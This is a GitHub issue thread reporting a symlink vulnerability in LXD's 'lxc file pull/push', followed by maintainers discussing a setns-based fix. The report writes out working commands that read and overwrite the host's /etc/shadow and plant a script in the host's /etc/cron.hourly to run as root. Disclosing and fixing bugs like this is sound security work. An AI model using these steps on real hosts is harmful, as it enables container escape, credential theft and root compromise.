### ISSUE TITLE
lxc file pull/push symlink security issue

### ISSUE THREAD

**Issue by jhenninger** [lxc/lxd#789]
Absolute symlinks are interpreted relative to the host's root directory instead of the container's.

```
lxc exec container -- ln -s /etc/shadow /tmp/shadow
lxc file pull container/tmp/shadow shadow
```
`shadow` now contains the host's `/etc/shadow`. 
```
vim shadow #make some changes
lxc file push --mode=0600 shadow container/tmp/shadow
```
The host's `/etc/shadow` now has our changes.

Works with directories too:
```
touch script.sh
lxc exec container -- ln -s /etc/cron.hourly /tmp/cron
lxc file push --mode=0700 script.sh container/tmp/cron/
```

`script.sh` will now run every hour as root on the host system.

**Comment by tych0** [comment]
Thanks for the report, I'll send a patch shortly.

**Comment by jhenninger** [comment]
I've thought about this problem and found no good solutions. Even if you use something like `realpath` to determine the true location of a file, you are still subject to race conditions between the location check and the actual write/read.

**Comment by tych0** [comment]
The right solution is to `setns()` to the container's mount namespace before doing any of the file manipulations. This gets rid of the security checks entirely, and we can rely on the kernel for correctness. I don't know why I didn't implement it that way in the first place, though...

**Comment by stgraber** [comment]
@tych0 I guess we intended for file push/pull to work with a stopped container too. Though that makes a whole lot of things harder, especially once we do LVM.
